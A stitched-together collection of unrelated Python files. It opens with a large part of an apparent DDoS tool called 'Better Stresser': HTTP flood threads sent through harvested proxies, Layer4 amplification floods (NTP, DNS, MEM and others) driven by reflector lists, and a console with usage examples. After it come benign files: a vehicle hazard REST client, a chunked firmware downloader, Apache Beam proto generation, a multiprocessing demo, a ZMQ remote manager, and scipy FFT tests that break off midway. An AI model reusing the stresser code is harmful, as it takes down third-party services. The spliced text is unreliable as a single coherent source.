for _ in range(self._rpc):
if pro:
s.get(self._target.human_repr(), proxies=pro.asRequest())
continue
s.get(self._target.human_repr())
except Exception:
s.close()
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
proxes: Set[Proxy] = set()
lock = Lock()
for provider in cf["proxy-providers"]:
if provider["type"] != Proxy_type and Proxy_type != 0: continue
print("Downloading Proxies form %s" % provider["url"])
ProxyManager.download(provider, proxes, lock, ProxyType.stringToProxyType(str(provider["type"])))
return proxes
@staticmethod
def download(provider, proxes: Set[Proxy], threadLock: Lock, proxy_type: ProxyType) -> Any:
with suppress(TimeoutError, exceptions.ConnectionError, exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
for proxy in ProxyUtiles.parseAllIPPort(data.splitlines(), proxy_type):
with threadLock:
proxes.add(proxy)
class ToolsConsole:
METHODS = {"INFO", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = "%s@BetterStresser:~#" % gethostname()
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print("%s command not found" % cmd)
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
print(("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") % (Tools.humanbytes(t[0]),
Tools.humanbytes(t[1]),
Tools.humanformat(t[2]),
Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7],
str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
print('please wait ...', end="\r")
with get(domain, timeout=20) as r:
print(('status_code: %d\n'
'status: %s') % (r.status_code,
"ONLINE" if r.status_code <= 500 else "OFFLINE"))
return
print("Error! ")
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://', '').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
print(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n"
) % (info["country"],
info["city"],
info["org"],
info["isp"],
info["region"]))
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://', '').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
r = ping(domain, count=5, interval=0.2)
print(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n'
) % (r.address,
r.avg_rtt,
r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print(('* Coded By XEricDev For Better Stresser\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' Layer7: python3 %s <method> <url> <socks_type5.4.1> <threads> <proxylist> <rpc> <duration>\n'
' Layer4: python3 %s <method> <ip:port> <threads> <duration> <reflector file, (only use with '
'Amplification>\n'
'\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' Layer7: python3 %s %s %s %s %s proxy.txt %s %s\n'
' Layer4: python3 %s %s %s %s %s') % (argv[0], argv[0],
", ".join(Methods.LAYER4_METHODS),
len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS),
len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0],
randchoice([*Methods.LAYER7_METHODS]),
"https://example.com",
randchoice([4, 5, 1, 0]),
randint(850, 1000),
randint(50, 100),
randint(1000, 3600),
argv[0],
randchoice([*Methods.LAYER4_METHODS]),
"8.8.8.8:80",
randint(850, 1000),
randint(1000, 3600)
))
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
if __name__ == '__main__':
with open(currentDir / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP": raise IndexError()
if one == "TOOLS": ToolsConsole.runConsole()
if one == "STOP": ToolsConsole.stop()
method = one
event = Event()
event.clear()
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" % ", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
urlraw = argv[2].strip()
if not urlraw.startswith("http"): urlraw = "http://" + urlraw
url = URL(urlraw)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(currentDir / "files/proxies/" / argv[5].strip())
useragent_li = Path(currentDir / "files/useragent.txt")
referers_li = Path(currentDir / "files/referers.txt")
proxies: Any = set()
if not useragent_li.exists(): exit("The Useragent file doesn't exist ")
if not referers_li.exists(): exit("The Referer file doesn't exist ")
uagents = set(a.strip() for a in useragent_li.open("r+").readlines())
referers = set(a.strip() for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if proxy_ty not in {4, 5, 1, 0}: exit("Socks Type Not Found [4, 5, 1, 0]")
if threads > 1000: print("WARNING! thread is higher than 1000")
if rpc > 100: print("WARNING! RPC (Request Pre Connection) is higher than 100")
if not proxy_li.exists():
if rpc > 100: print("WARNING! The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
print(f"{len(Proxies):,} Proxies are getting checked, this may take awhile !")
Proxies = ProxyChecker.checkAll(Proxies, url.human_repr(), 1, threads)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem | The target may not be"
" available.")
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if not proxies:
print("Empty Proxy File, Running flood witout proxy")
proxies = None
if proxies:
print(f"Proxy Count: {len(proxies):,}")
for _ in range(threads):
Thread(target=HttpFlood, args=(url, method, rpc, event, uagents, referers, proxies,),
daemon=True).start()
if method in Methods.LAYER4_METHODS:
target = argv[2].strip()
if ":" in target and not target.split(":")[1].isnumeric(): exit("Invalid Port Number")
port = 53 if ":" not in target else int(target.split(":")[1])
threads = int(argv[3])
timer = int(argv[4])
ref = None
if ":" not in target:
print("WARNING! Port Not Selected, Set To Default: 80")
else:
target = target.split(":")[0]
if 65535 < port or port < 1: exit("Invalid Port [Min: 1 / Max: 65535] ")
if not ProxyTools.Patterns.IP.match(target): exit("Invalid Ip Selected")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket(): exit("Cannot Create Raw Socket ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "ARD"}:
if len(argv) == 6:
refl_li = Path(currentDir / "files" / argv[5].strip())
if not refl_li.exists(): exit("The Reflector file doesn't exist ")
ref = set(a.strip() for a in ProxyTools.Patterns.IP.findall(refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
for _ in range(threads):
Thread(target=Layer4, args=((target, port), ref, method, event,), daemon=True).start()
print("Attack Started !")
event.set()
while timer:
timer -= 1
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
RestClientWindow.py
|
#RestClientThreads.py
import requests
import json
import time
import threading
#TYPE: ORIGINAL FILE
#MODIFICATION: This file NEEDS TO BE MODIFIED
#-According to the layer, a different NUMBER_POA_SCENARIO is required
#DATE: 15-04-2020
#TO-DOs:
# -Testing not updated
"""
DESCRIPTION:
#Implements the window approach, were a car publishes to the current server, the prevous one and the next one
#This script attempts to creates 3 independent thread3 used to publish to each given URL.
#in single approach we just publish to one server at a given time
"""
NUMBER_POA_SCENARIO=8 #MODIFICATION-this must be the same number of active servers in the scenario
detected_hazards_urls=['http://192.168.122.104:30131/detected_hazard','http://192.168.122.104:30131/detected_hazard','http://192.168.122.104:30131/detected_hazard'] #URL of the server when using AdvantEDGE
url_vehicles='http://192.168.122.104:30131/vehiclelist'
#define the headers to be sent in the post request
headers={'accept':'application/json','content-type':'application/json'}
#Generates the message to be posted --> returns: payload
#Parameters:
#h_identifier = a unique identifier of the hazard
#h_name = additional information about the hazard (not used for now)
#h_type = a 2-char string giving the type of hazard (an-->animal, ph-->pothole, pd-->pedestrian...)
#h_location = the location where the car started to "detect" the hazard
def set_payload(h_identifier,h_name, h_type, h_location):
payload='''{
"id": "''' + str(h_identifier)+ '''",
"sn": "'''+ str(h_name) + '''",
"ht": "''' + str(h_type)+ '''",
"l": "'''+ str(h_location)[0:10]+ '''"
}'''
return payload
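#Note: set_payload assembles the JSON by hand; a hedged, equivalent sketch using the
#already-imported json module (same field names as above) would be:
#
#    payload = json.dumps({"id": str(h_identifier), "sn": str(h_name),
#                          "ht": str(h_type), "l": str(h_location)[0:10]})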
#Posts a generic message to the server and prints the response
#Parameters:
#url: server url where to post
#payload: the string to post
def post_server (url,payload):
response=requests.post(url,data=(payload),headers=headers)
print (response)
#registers the vehicle in the server
#Parameters:
#V_id: the identifier of the vehicle (v001-v002...)
#port_v: the port the vehicle uses for the communication
def post_vehicle_registration (V_id, port_v):
payload='''{
"id": "''' + str(V_id)+ '''",
"port": "'''+ str(port_v) + '''"
}'''
response=requests.post(url_vehicles,data=(payload),headers=headers)
#print (response)
#Gets the list of vehicles registered in the server
#returns --> string containing the vehicle information
def get_vehicle_list():
r = requests.get(url_vehicles)
#r.text returns the data given by the server (corresponding to the information asked)
return r.text
#Creates an independent thread for each server where we want to post
#Parameters:
#h_identifier = a unique identifier of the hazard
#h_name = additional information about the hazard (not used for now)
#h_type = a 2-char string giving the type of hazard (an-->animal, ph-->pothole, pd-->pedestrian...)
#h_location = the location where the car started to "detect" the hazard
#PoA = index of the point of access (server) the vehicle is currently attached to
def post_hazard (h_identifier,h_name, h_type, h_location,PoA):
payload=set_payload(h_identifier,h_name, h_type, h_location)
if PoA==1:
"""detected_hazards_urls[0]='http://192.168.122.104:301'+str(PoA+30)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:301'+str(PoA+30)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:301'+str(PoA+31)+'/detected_hazard' """
detected_hazards_urls[0]='http://192.168.122.104:151'+str(PoA+50)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:151'+str(PoA+50)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:151'+str(PoA+51)+'/detected_hazard'
elif PoA==NUMBER_POA_SCENARIO:
"""detected_hazards_urls[0]='http://192.168.122.104:301'+str(PoA+30)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:301'+str(PoA+29)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:301'+str(PoA+30)+'/detected_hazard' """
detected_hazards_urls[0]='http://192.168.122.104:151'+str(PoA+50)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:151'+str(PoA+49)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:151'+str(PoA+50)+'/detected_hazard'
else:
"""detected_hazards_urls[0]='http://192.168.122.104:301'+str(PoA+30)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:301'+str(PoA+29)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:301'+str(PoA+31)+'/detected_hazard' """
detected_hazards_urls[0]='http://192.168.122.104:151'+str(PoA+50)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:151'+str(PoA+49)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:151'+str(PoA+51)+'/detected_hazard'
#print(detected_hazards_urls)
for url in detected_hazards_urls:
x0_vehicle_movement = threading.Thread(target=poster, args=(payload,url))
x0_vehicle_movement.daemon = True
x0_vehicle_movement.start()
#Posts a hazard to the server and prints how long the request took
#Parameters:
#payload: the formatted data to be posted
#url: the server url
def poster (payload,url):
#print("starting thread:", url)
posting_time=time.time()
response=requests.post(url,data=(payload),headers=headers)
end_posting_time=time.time()
print ("time: ",url,end_posting_time-posting_time)
#Gets the list of hazards registered in the server
#returns --> string containing the hazard information
def get_hazards_list():
    r = requests.get(detected_hazards_urls[0])  # query the current server in the window
#r.text returns the data given by the server (corresponding to the information asked)
return r.text
#deletes a given hazard in the server DB
#returns --> 204 on success
def delete_hazard(identifier):
    url = detected_hazards_urls[0] + "/" + str(identifier)  # target the current server in the window
r = requests.delete(url)
#r.text returns the data given by the server (corresponding to the information asked)
return r
#TODO: TESTING NOT UPDATED
if __name__ == "__main__":
post_vehicle_registration("v001",5005)
print (get_vehicle_list())
while True:
start_time = time.time()
print ("posting test hazard 1-test")
        resp = post_hazard("h100", "Testing_hazard1", "Test1", 1234, 1)  # PoA=1 chosen arbitrarily for this test
end_time = time.time()
print ("Post time: ", end_time - start_time)
time.sleep(2)
|
donlonder.py
|
from threading import Thread, Lock
import requests
import shutil
import time
import os
DATA_PATH = "data"
ipsw_url = "http://updates-http.cdn-apple.com/2019FallFCS/fullrestores/061-08416/B909A8DE-C875-11E9-BEC0-C95359F8FB35/iPhone11,8_13.0_17A577_Restore.ipsw"
info = requests.head(ipsw_url).headers
content_length = int(info.get('Content-Length'))
class Loader():
def __init__(self):
self.perc = 0
self.lock = Lock()
def print(self):
# print("\r" + ("#" * 10))
print("\r{} > {}% ".format("#" * self.perc, self.perc), end='')
def add(self):
self.lock.acquire()
try:
self.perc += 1
self.print()
except:
pass
self.lock.release()
loader = Loader()
def calculate_ranges(size, chunks_count = 1):
chunk_size = int(size / chunks_count)
chunks = []
chunked = 0
for index in range(chunks_count - 1):
chunked = chunk_size * (index + 1)
chunks.append([
chunk_size * index,
chunked - 1,
])
chunks.append([
chunked,
size,
])
return chunks
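# Worked example (illustrative): calculate_ranges(10, 3) returns [[0, 2], [3, 5], [6, 10]],
# i.e. chunks_count - 1 chunks of chunk_size bytes plus a final chunk covering the rest;
# each pair later becomes an HTTP "Range: bytes=<start>-<end>" header.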
def download_chunk_range(url, index, chunk_range):
def download():
try:
content_range = "{}-{}".format(*chunk_range)
response = requests.get(url, headers={"Range": "bytes={}".format(content_range)})
filename = "data/file.ipsw{}".format(index)
            with open(filename, "wb") as f:
                f.write(response.content)
        except Exception as e:
            print("Downloading error: %s (%s)" % (index, e))
return False
return True
while not download():
pass
loader.add()
def mkdir(path):
if not os.path.exists(path):
os.mkdir(path)
# print(content_length)
# print(calculate_ranges(content_length, 100))
# exit()
mkdir(DATA_PATH)
# data_len = 4093153955
data_len = 100000000
data_len = content_length
content_ranges = calculate_ranges(data_len, 100)
for index, content_range in enumerate(content_ranges):
Thread(target=download_chunk_range, args=(ipsw_url, index, content_range)).start()
loader.print()
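# The 100 part files written above (data/file.ipsw0 .. data/file.ipsw99) are never
# merged by this script. A hedged sketch of concatenating them in index order once
# all downloads have finished (the output filename is arbitrary):
#
#     with open("data/file.ipsw", "wb") as out:
#         for i in range(len(content_ranges)):
#             with open("data/file.ipsw{}".format(i), "rb") as part:
#                 shutil.copyfileobj(part, out)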
|
gen_protos.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Generates Python proto modules and grpc stubs for Beam protos."""
from __future__ import absolute_import
from __future__ import print_function
import glob
import logging
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import time
import warnings
import pkg_resources
# TODO(BEAM-5414): latest grpcio-tools incompatible with latest protobuf 3.6.1.
GRPC_TOOLS = 'grpcio-tools>=1.3.5,<=1.14.2'
BEAM_PROTO_PATHS = [
os.path.join('..', '..', 'model', 'pipeline', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'job-management', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'fn-execution', 'src', 'main', 'proto'),
]
PYTHON_OUTPUT_PATH = os.path.join('apache_beam', 'portability', 'api')
MODEL_RESOURCES = [
os.path.normpath('../../model/fn-execution/src/main/resources'\
+ '/org/apache/beam/model/fnexecution/v1/standard_coders.yaml'),
]
def generate_proto_files(force=False):
try:
import grpc_tools # pylint: disable=unused-variable
except ImportError:
warnings.warn('Installing grpcio-tools is recommended for development.')
py_sdk_root = os.path.dirname(os.path.abspath(__file__))
common = os.path.join(py_sdk_root, '..', 'common')
proto_dirs = [os.path.join(py_sdk_root, path) for path in BEAM_PROTO_PATHS]
proto_files = sum(
[glob.glob(os.path.join(d, '*.proto')) for d in proto_dirs], [])
out_dir = os.path.join(py_sdk_root, PYTHON_OUTPUT_PATH)
out_files = [path for path in glob.glob(os.path.join(out_dir, '*_pb2.py'))]
if out_files and not proto_files and not force:
# We have out_files but no protos; assume they're up to date.
# This is actually the common case (e.g. installation from an sdist).
logging.info('No proto files; using existing generated files.')
return
elif not out_files and not proto_files:
if not os.path.exists(common):
raise RuntimeError(
'Not in apache git tree; unable to find proto definitions.')
else:
raise RuntimeError(
'No proto files found in %s.' % proto_dirs)
# Regenerate iff the proto files or this file are newer.
elif force or not out_files or len(out_files) < len(proto_files) or (
min(os.path.getmtime(path) for path in out_files)
<= max(os.path.getmtime(path)
for path in proto_files + [os.path.realpath(__file__)])):
try:
from grpc_tools import protoc
except ImportError:
if platform.system() == 'Windows':
# For Windows, grpcio-tools has to be installed manually.
raise RuntimeError(
'Cannot generate protos for Windows since grpcio-tools package is '
'not installed. Please install this package manually '
'using \'pip install grpcio-tools\'.')
# Use a subprocess to avoid messing with this process' path and imports.
# Note that this requires a separate module from setup.py for Windows:
# https://docs.python.org/2/library/multiprocessing.html#windows
p = multiprocessing.Process(
target=_install_grpcio_tools_and_generate_proto_files)
p.start()
p.join()
if p.exitcode:
raise ValueError("Proto generation failed (see log for details).")
else:
logging.info('Regenerating out-of-date Python proto definitions.')
builtin_protos = pkg_resources.resource_filename('grpc_tools', '_proto')
args = (
[sys.executable] + # expecting to be called from command line
['--proto_path=%s' % builtin_protos] +
['--proto_path=%s' % d for d in proto_dirs] +
['--python_out=%s' % out_dir] +
# TODO(robertwb): Remove the prefix once it's the default.
['--grpc_python_out=grpc_2_0:%s' % out_dir] +
proto_files)
ret_code = protoc.main(args)
if ret_code:
raise RuntimeError(
'Protoc returned non-zero status (see logs for details): '
'%s' % ret_code)
# copy resource files
for path in MODEL_RESOURCES:
shutil.copy2(os.path.join(py_sdk_root, path), out_dir)
ret_code = subprocess.call(["pip", "install", "future==0.16.0"])
if ret_code:
raise RuntimeError(
'Error installing future during proto generation')
ret_code = subprocess.call(
["futurize", "--both-stages", "--write", "--verbose", "--no-diff",
out_dir])
if ret_code:
raise RuntimeError(
'Error applying futurize to generated protobuf python files.')
# Though wheels are available for grpcio-tools, setup_requires uses
# easy_install which doesn't understand them. This means that it is
# compiled from scratch (which is expensive as it compiles the full
# protoc compiler). Instead, we attempt to install a wheel in a temporary
# directory and add it to the path as needed.
# See https://github.com/pypa/setuptools/issues/377
def _install_grpcio_tools_and_generate_proto_files():
install_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.eggs', 'grpcio-wheels')
build_path = install_path + '-build'
if os.path.exists(build_path):
shutil.rmtree(build_path)
logging.warning('Installing grpcio-tools into %s', install_path)
try:
start = time.time()
subprocess.check_call(
[sys.executable, '-m', 'pip', 'install',
'--target', install_path, '--build', build_path,
'--upgrade', GRPC_TOOLS])
logging.warning(
'Installing grpcio-tools took %0.2f seconds.', time.time() - start)
finally:
sys.stderr.flush()
shutil.rmtree(build_path, ignore_errors=True)
sys.path.append(install_path)
try:
generate_proto_files()
finally:
sys.stderr.flush()
if __name__ == '__main__':
generate_proto_files(force=True)
|
multiprocess_test.py
|
import multiprocessing
num_procs = 4
def do_work(message):
print ("work",message ,"completed")
def worker():
for item in iter( q.get, None ):
do_work(item)
q.task_done()
q.task_done()
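# Each worker treats None as a sentinel: iter(q.get, None) stops on it, and the extra
# q.task_done() above accounts for that sentinel so the final q.join() below can
# return. One None is therefore put per worker process further down. Note that this
# script assumes a fork start method (Linux); spawn-based platforms would also need
# an `if __name__ == "__main__":` guard around the module-level code.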
q = multiprocessing.JoinableQueue()
procs = []
for i in range(num_procs):
procs.append( multiprocessing.Process(target=worker) )
procs[-1].daemon = True
procs[-1].start()
source = ['hi','there','how','are','you','doing']
for item in source:
q.put(item)
q.join()
for p in procs:
q.put( None )
q.join()
for p in procs:
p.join()
print ("Finished everything....")
print ("num active children:", multiprocessing.active_children())
|
remote_manager.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from six.moves import queue
import threading
import zmq
from parl.utils import logger, to_byte, to_str
from parl.remote import remote_constants
from parl.remote.remote_object import RemoteObject
"""
Two steps to build the communication with remote clients:
1. Create a RemoteManager;
2. Get remote objects by calling the function get_remote.
```python
remote_manager = RemoteManager(port=[port])
remote_obj = remote_manager.get_remote()
```
"""
class RemoteManager(object):
"""
    Base class for network communication.
"""
def __init__(self, port):
"""
Args:
port(int): a local port used for connections from remote clients.
"""
self.zmq_context = zmq.Context()
socket = self.zmq_context.socket(zmq.REP)
socket.bind("tcp://*:{}".format(port))
self.socket = socket
self.socket.linger = 0
self.remote_pool = queue.Queue()
t = threading.Thread(target=self._wait_for_connection)
        t.setDaemon(True)  # the thread exits when the main thread exits
t.start()
def _wait_for_connection(self):
"""
        A never-ending loop that keeps waiting for connections from remote clients.
        It puts each newly connected remote object into an internal pool; remote
        objects can then be obtained by calling `get_remote`.
        Note that this function is already called inside `__init__`.
"""
while True:
try:
message = self.socket.recv_multipart()
tag = message[0]
if tag == remote_constants.CONNECT_TAG:
self.socket.send_multipart([
remote_constants.NORMAL_TAG, b'Connect server success.'
])
client_info = to_str(message[1])
remote_client_address, remote_client_id = client_info.split(
)
remote_obj = RemoteObject(remote_client_address,
remote_client_id,
self.zmq_context)
logger.info('[RemoteManager] Added a new remote object.')
self.remote_pool.put(remote_obj)
elif tag == remote_constants.HEARTBEAT_TAG:
self.socket.send_multipart(
[remote_constants.NORMAL_TAG, b'Server is alive.'])
else:
raise NotImplementedError()
except zmq.ZMQError:
logger.warning('Zmq error, exiting server.')
break
def get_remote(self):
"""
A blocking function to obtain a remote object.
Returns:
RemoteObject
"""
return self.remote_pool.get()
def close(self):
"""
Close RemoteManager.
"""
self.zmq_context.destroy()
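        # destroy() closes every socket created from this context, so the
        # blocking recv_multipart in _wait_for_connection raises zmq.ZMQError
        # and the daemon listener thread breaks out of its loop and exits.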
|
test_numpy.py
|
import queue
import threading
import multiprocessing
import numpy as np
import pytest
from numpy.random import random
from numpy.testing import (
assert_array_almost_equal, assert_array_equal, assert_allclose
)
from pytest import raises as assert_raises
import scipy.fft as fft
def fft1(x):
L = len(x)
phase = -2j*np.pi*(np.arange(L)/float(L))
phase = np.arange(L).reshape(-1, 1) * phase
return np.sum(x*np.exp(phase), axis=1)
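# fft1 above is the naive O(N^2) reference DFT used to validate fft.fft:
# X[k] = sum_n x[n] * exp(-2j*pi*k*n/N); phase[k, n] holds the exponent for
# output bin k and input sample n, and the sum over axis=1 collapses n.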
class TestFFTShift(object):
def test_fft_n(self):
assert_raises(ValueError, fft.fft, [1, 2, 3], 0)
class TestFFT1D(object):
def test_identity(self):
maxlen = 512
x = random(maxlen) + 1j*random(maxlen)
xr = random(maxlen)
for i in range(1,maxlen):
assert_array_almost_equal(fft.ifft(fft.fft(x[0:i])), x[0:i],
decimal=12)
assert_array_almost_equal(fft.irfft(fft.rfft(xr[0:i]),i),
xr[0:i], decimal=12)
def test_fft(self):
x = random(30) + 1j*random(30)
expect = fft1(x)
assert_array_almost_equal(expect, fft.fft(x))
assert_array_almost_equal(expect, fft.fft(x, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30),
fft.fft(x, norm="ortho"))
assert_array_almost_equal(expect / 30, fft.fft(x, norm="forward"))
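    # Normalization conventions exercised throughout these tests (standard
    # scipy.fft semantics): "backward" (the default) applies no scaling on the
    # forward transform and 1/n on the inverse, "ortho" applies 1/sqrt(n) in
    # both directions, and "forward" applies 1/n on the forward transform and
    # none on the inverse -- hence the expect / np.sqrt(30) and expect / 30
    # checks above.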
def test_ifft(self):
x = random(30) + 1j*random(30)
assert_array_almost_equal(x, fft.ifft(fft.fft(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.ifft(fft.fft(x, norm=norm), norm=norm))
def test_fft2(self):
x = random((30, 20)) + 1j*random((30, 20))
expect = fft.fft(fft.fft(x, axis=1), axis=0)
assert_array_almost_equal(expect, fft.fft2(x))
assert_array_almost_equal(expect, fft.fft2(x, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30 * 20),
fft.fft2(x, norm="ortho"))
assert_array_almost_equal(expect / (30 * 20),
fft.fft2(x, norm="forward"))
def test_ifft2(self):
x = random((30, 20)) + 1j*random((30, 20))
expect = fft.ifft(fft.ifft(x, axis=1), axis=0)
assert_array_almost_equal(expect, fft.ifft2(x))
assert_array_almost_equal(expect, fft.ifft2(x, norm="backward"))
assert_array_almost_equal(expect * np.sqrt(30 * 20),
fft.ifft2(x, norm="ortho"))
assert_array_almost_equal(expect * (30 * 20),
fft.ifft2(x, norm="forward"))
def test_fftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
expect = fft.fft(fft.fft(fft.fft(x, axis=2), axis=1), axis=0)
assert_array_almost_equal(expect, fft.fftn(x))
assert_array_almost_equal(expect, fft.fftn(x, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30 * 20 * 10),
fft.fftn(x, norm="ortho"))
assert_array_almost_equal(expect / (30 * 20 * 10),
fft.fftn(x, norm="forward"))
def test_ifftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
expect = fft.ifft(fft.ifft(fft.ifft(x, axis=2), axis=1), axis=0)
assert_array_almost_equal(expect, fft.ifftn(x))
assert_array_almost_equal(expect, fft.ifftn(x, norm="backward"))
assert_array_almost_equal(fft.ifftn(x) * np.sqrt(30 * 20 * 10),
fft.ifftn(x, norm="ortho"))
assert_array_almost_equal(expect * (30 * 20 * 10),
fft.ifftn(x, norm="forward"))
def test_rfft(self):
x = random(29)
for n in [x.size, 2*x.size]:
for norm in [None, "backward", "ortho", "forward"]:
assert_array_almost_equal(
fft.fft(x, n=n, norm=norm)[:(n//2 + 1)],
fft.rfft(x, n=n, norm=norm))
assert_array_almost_equal(fft.rfft(x, n=n) / np.sqrt(n),
fft.rfft(x, n=n, norm="ortho"))
def test_irfft(self):
x = random(30)
